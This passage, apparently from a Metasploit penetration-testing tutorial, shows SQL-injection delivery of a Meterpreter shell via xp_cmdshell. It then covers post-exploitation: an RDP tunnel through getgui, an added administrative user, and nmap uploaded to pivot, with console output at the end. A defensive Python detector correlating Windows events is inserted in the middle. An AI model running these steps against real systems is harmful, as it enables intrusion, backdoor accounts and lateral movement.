Simulated Penetration Test
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...
. . . SNIP . . .
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
This should look familiar. We've essentially attacked the web application through Fast-Track and exploited it via SQL injection attacks. We used the xp_cmdshell stored procedure and the binary-to-hex conversion technique to present a full-fledged Meterpreter shell.
Post Exploitation
At this point, we should have a Meterpreter console running in the background within msfconsole, so we can begin to scan the target's subnet for other live systems. To do this, we'll upload nmap to the target and run it from the Windows machine.
First, download nmap from insecure.org in an executable format and save it locally. We'll be uploading this to our target. Next, we'll connect to the target via Microsoft's Remote Desktop Protocol (RDP), a built-in graphical remote administration protocol that lets you interact with the Windows Desktop as if you were sitting in front of the remote machine. After we're connected with our Meterpreter session, we'll use the getgui Meterpreter script to tunnel RDP back out to us over port 8080 and add a new administrative user to the system.
We enter rdesktop localhost:8080 from Back|Track's command line, so we can log into the system with the newly created user account. We then use Meterpreter to upload nmap to the target. Our goal is to install nmap on the compromised Windows target and use the system as a staging ground for further attacks. Alternatively, you could use scanner/portscan/syn and scanner/portscan/tcp to port scan directly through Metasploit. The choice is a matter of personal preference and needs.
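From the defender's side, each step getgui performs (enabling RDP, setting Terminal Services to auto-start, opening the firewall, adding an administrative user) normally leaves a Windows event. The Python below is an added example, not code from the book or from Metasploit: it correlates per-host events and alerts when several of these stages land within a short window. The event IDs and the fDenyTSConnections registry value are standard Windows ones; the sample records and their field layout are constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the page), in a simplified record form.
SAMPLE_EVENTS = [
    {"ts": "2011-05-01T10:00:05", "host": "web01", "id": 4657,
     "value": "fDenyTSConnections", "new": "0"},           # RDP enabled via registry
    {"ts": "2011-05-01T10:00:06", "host": "web01", "id": 7040,
     "service": "TermService", "new": "auto start"},       # service start type changed
    {"ts": "2011-05-01T10:00:07", "host": "web01", "id": 4946,
     "rule": "Remote Desktop (TCP-In)"},                   # firewall exception added
    {"ts": "2011-05-01T10:00:08", "host": "web01", "id": 4720,
     "user": "support"},                                   # local user created
    {"ts": "2011-05-01T10:00:09", "host": "web01", "id": 4732,
     "user": "support", "group": "Administrators"},        # added to Administrators
    # Benign: a lone account creation on another host, no other stages.
    {"ts": "2011-05-01T14:30:00", "host": "db02", "id": 4720, "user": "jsmith"},
]

WINDOW = timedelta(minutes=5)   # how close together the stages must occur
MIN_STAGES = 3                  # distinct stages needed before alerting

def classify(ev):
    """Map one event to a getgui-style stage name, or None if unrelated."""
    eid = ev["id"]
    if eid == 4657 and ev.get("value") == "fDenyTSConnections" and ev.get("new") == "0":
        return "rdp_enabled"
    if eid == 7040 and ev.get("service") == "TermService" and "auto" in ev.get("new", ""):
        return "termservice_autostart"
    if eid == 4946:
        return "firewall_rule_added"
    if eid == 4720:
        return "local_user_created"
    if eid == 4732 and ev.get("group") == "Administrators":
        return "added_to_administrators"
    return None

def detect(events, window=WINDOW, min_stages=MIN_STAGES):
    """Return one alert per host whose distinct stages within `window` reach min_stages."""
    per_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), stage))
    alerts = []
    for host, hits in per_host.items():
        for i, (t0, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts.append({"host": host, "start": t0.isoformat(), "stages": sorted(stages)})
                break
    return alerts
```

Against the sample data only web01 is flagged; the single 4720 on db02 never reaches the stage threshold.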
meterpreter > run getgui -e -f 8080
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter > shell